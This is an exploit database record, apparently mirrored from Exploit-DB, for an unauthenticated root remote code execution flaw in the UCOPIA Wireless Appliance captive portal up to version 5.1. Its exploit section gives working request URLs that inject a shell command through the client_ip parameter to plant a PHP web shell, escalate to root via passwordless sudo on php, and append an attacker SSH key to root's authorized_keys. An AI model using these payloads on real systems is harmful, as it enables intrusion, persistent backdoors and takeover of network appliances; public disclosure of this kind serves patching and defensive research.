ID
VAR-E-201710-0367
EDB ID
42949
TITLE
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution - Linux remote Exploit
Trust: 0.6
DESCRIPTION
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution.. remote exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | ucopia | model: | wireless appliance | scope: | lt | version: | 5.1 | Trust: 1.6 |
EXPLOIT
# Exploit Title: Unauthenticated remote root code execution on captive
portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Root Remote Code Execution
Trust: 1.0
CREDITS
agix
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 42949 | Trust: 1.6 |
| db: | EDBNET | id: | 94404 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/42949/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 42949 |
| db: | EDBNET | id: | 94404 |
LAST UPDATE DATE
2022-07-27T09:42:21.973000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 42949 | date: | 2017-10-02T00:00:00 |
| db: | EDBNET | id: | 94404 | date: | 2017-10-03T00:00:00 |